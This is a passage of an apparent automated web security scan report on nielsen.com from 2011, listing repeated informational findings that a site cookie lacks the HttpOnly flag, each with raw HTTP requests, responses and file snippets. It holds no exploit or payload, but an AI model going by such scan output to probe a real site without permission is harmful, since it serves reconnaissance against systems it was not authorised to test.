User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:49 GMT
ETag: "e78012-34-4ad7b8c0baa40"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 52

.twoColumnPage div.logo img {
margin: 0 0 0 0;
}


4.32. http://nielsen.com/etc/designs/corporate/additions.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/additions.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/additions.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:49 GMT
ETag: "be80a7-6b07-4ad7c1b18c240"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 27399

/******************************************************************************/
/* new additions for search, custom components, etc.
/*****************************************************************
...[SNIP]...

4.33. http://nielsen.com/etc/designs/corporate/clientlibs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806e-0-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 0


4.34. http://nielsen.com/etc/designs/corporate/clientlibs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:49 GMT
ETag: "e78018-23310-4ad7b8c0baa40"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 144144

/*
* Copyright 1997-2009 Day Management AG
* Barfuesserplatz 6, 4001 Basel, Switzerland
* All Rights Reserved.
*
* This software is the confidential and proprietary information of
* Day Manageme
...[SNIP]...

4.35. http://nielsen.com/etc/designs/corporate/clientlibs/themes/default.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/clientlibs/themes/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/clientlibs/themes/default.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be806a-0-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 0


4.36. http://nielsen.com/etc/designs/corporate/cq.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/cq.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/cq.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:28 GMT
ETag: "be802a-bbe2-4ad7c19d85300"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 48098

/******************************************************************************/
/* CQ 5.3 common
/******************************************************************************/
body {
/*bac
...[SNIP]...

4.37. http://nielsen.com/etc/designs/corporate/images/bullet-n3.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/bullet-n3.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/bullet-n3.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:54 GMT
ETag: "be80b1-4f-4ad7c1b650d80"
Accept-Ranges: bytes
Content-Length: 79
Content-Type: image/gif

GIF89a
.
...........K...............!.......,....
.
....H...m.......D..#QP.$.;

4.38. http://nielsen.com/etc/designs/corporate/images/default.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/default.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/default.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/content/corporate/us/en/search.html?q=mobile+tv+internet
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionPersistence=CLICKSTREAMCLOUD%3A%3DvisitorId%3Danonymous%7CPROFILEDATA%3A%3Davatar%3D%2Fetc%2Fdesigns%2Fdefault%2Fimages%2Fcollab%2Favatar.png%2CauthorizableId%3Danonymous%2CauthorizableId_xss%3Danonymous%2CformattedName%3D%2CformattedName_xss%3D%7CSURFERINFO%3A%3DIP%3D127.0.0.1%2Ckeywords%3D%2Cbrowser%3DChrome%2COS%3DWindows%2Cresolution%3D1920x1200%7C; Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.4.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:17:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:44:27 GMT
ETag: "be8173-2b-4ad7c28172cc0"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.39. http://nielsen.com/etc/designs/corporate/images/pix.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/pix.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/pix.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:32 GMT
ETag: "be804e-2b-4ad7c1a155c00"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.40. http://nielsen.com/etc/designs/corporate/images/topnav/navFirst.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navFirst.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navFirst.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:54 GMT
ETag: "e78049-6b1-4ad7b8c57f580"
Accept-Ranges: bytes
Content-Length: 1713
Content-Type: image/gif

GIF89a0.Y...............................................................................................................................................................................................
...[SNIP]...

4.41. http://nielsen.com/etc/designs/corporate/images/topnav/navGround.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navGround.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navGround.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:32 GMT
ETag: "be8053-751-4ad7c1a155c00"
Accept-Ranges: bytes
Content-Length: 1873
Content-Type: image/gif

GIF89a..*...............................................................................................................................................................................................
...[SNIP]...

4.42. http://nielsen.com/etc/designs/corporate/images/topnav/navNormal.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/images/topnav/navNormal.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/images/topnav/navNormal.gif HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559; __utma=221383559.465396599.1316711871.1316711871.1316711871.1; __utmb=221383559.1.10.1316711871; __utmc=221383559; __utmz=221383559.1316711871.1.1.utmcsr=nielsen-online.com|utmccn=(referral)|utmcmd=referral|utmcct=/intlpage.html

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:35 GMT
ETag: "e78094-21a-4ad7b8ec991c0"
Accept-Ranges: bytes
Content-Length: 538
Content-Type: image/gif

GIF89a<.*...............................................................................................................................................................................................
...[SNIP]...

4.43. http://nielsen.com/etc/designs/corporate/nielsencustom.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/nielsencustom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/nielsencustom.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8085-569e-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 22174


/******************************************************************************/
/* nielsencustom.css (strip down version,
removed some common style to prevent overridden CQ 5.3 style)
/*********
...[SNIP]...

4.44. http://nielsen.com/etc/designs/corporate/pagelayout.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/pagelayout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/pagelayout.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:01:12 GMT
ETag: "e78069-a60-4ad7b8d6a9e00"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 2656


/******************************************************************************/
/* page layouts CQ 5.3
/******************************************************************************/
body.n-bod
...[SNIP]...

4.45. http://nielsen.com/etc/designs/corporate/reset.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/reset.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/reset.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:00:59 GMT
ETag: "e78060-573-4ad7b8ca440c0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 1395

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
/**
* YUI Reset
* @module reset
* @namespac
...[SNIP]...

4.46. http://nielsen.com/etc/designs/corporate/static.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static.css HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:39 GMT
ETag: "be8082-b3-4ad7c1a802bc0"
Accept-Ranges: bytes
Content-Type: text/css
Vary: Accept-Encoding
Content-Length: 179

@import url("reset.css");
@import url("nielsencustom.css");
@import url("pagelayout.css");
@import url("topnav.css");
@import url("additions.css");
@import url("cq.css");


4.47. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:30 GMT
ETag: "be8042-dfa7-4ad7c19f6d780"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 57255

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...

4.48. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
Set-Cookie: Nielsen.com-cookie=R3976301559; path=/; expires=Thu, 22-Sep-2011 17:57:05 GMT
Date: Thu, 22 Sep 2011 12:16:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b Communique/4.0.8
Last-Modified: Wed, 21 Sep 2011 23:40:36 GMT
ETag: "be8069-4829-4ad7c1a526500"
Accept-Ranges: bytes
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 18473

jQuery.autocomplete = function(input, options) {
// Create a link to self
var me = this;

// Create jQuery object for input element
var $input = $(input).attr("autocomplete", "off");


...[SNIP]...

4.49. http://nielsen.com/etc/designs/corporate/static/js/horzNav.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nielsen.com
Path:   /etc/designs/corporate/static/js/horzNav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: Nielsen.com-cookie. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /etc/designs/corporate/static/js/horzNav.js HTTP/1.1
Host: nielsen.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://nielsen.com/us/en/measurement/online-measurement.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Nielsen.com-cookie=R3976301559

Response

HTTP/1.1 200 OK
